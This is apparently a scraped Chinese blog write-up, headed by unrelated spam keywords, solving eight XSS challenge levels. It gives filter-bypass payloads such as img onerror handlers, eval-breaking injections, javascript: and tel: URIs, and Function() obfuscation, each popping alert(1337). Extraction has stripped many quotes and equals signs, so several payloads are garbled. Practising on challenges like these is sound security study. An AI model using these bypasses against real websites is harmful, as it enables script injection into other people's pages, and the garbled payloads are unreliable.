营销网站价格,永不倒闭的10大央企,大学生网页设计作业成品下载,网络游戏代理平台文章目录 例1要求 例2代码解析方法 例3例4例5例6例7例8 例1 本题通过get接收并传递参数#xff0c;所有参数不经过过滤直接放入h2标签里面。
要求
1.需要页面弹出1337 2.不能与用户交互
官方认为innerHTML中script标签不安全#xff0c;所以将其禁用#xff0c;但只禁用了… 文章目录 例1要求 例2代码解析方法 例3例4例5例6例7例8 例1 本题通过get接收并传递参数所有参数不经过过滤直接放入h2标签里面。
要求
1.需要页面弹出1337 2.不能与用户交互
官方认为innerHTML中script标签不安全所以将其禁用但只禁用了此标签所以我们可以使用其它标签来进行弹窗。
这里我们可以直接使用img标签。
img src 1 onerror alert1337例2 代码解析 1.当给jeff传值时显示所传值无值时显示JEFFF 2.eval中将Ma name $(jeff)赋值给ma 3.将ma放入h2标签下 setTimeout 1000 表示在一秒后执行一次。
方法
由于maname使用了innerText属性所以传递到maname的内容均为文本无法执行代码因此我们就可以将eval中的代码闭合来执行我们的恶意代码。
?jeff1;alert(1337);例3 ?weyaaaonfocus alert(1337) autofocus例4 ?ricardojavascript:alert(1337)例5 ?markassbrownleeimg%20src1%20onerrorlocationjavascript:alert%25281337%2529例6 例7 ?mafiaFunction(/ALERT(1337)/.source.toLowerCase())()例8 ?boomera%20idok%20hreftel:alert(1337)
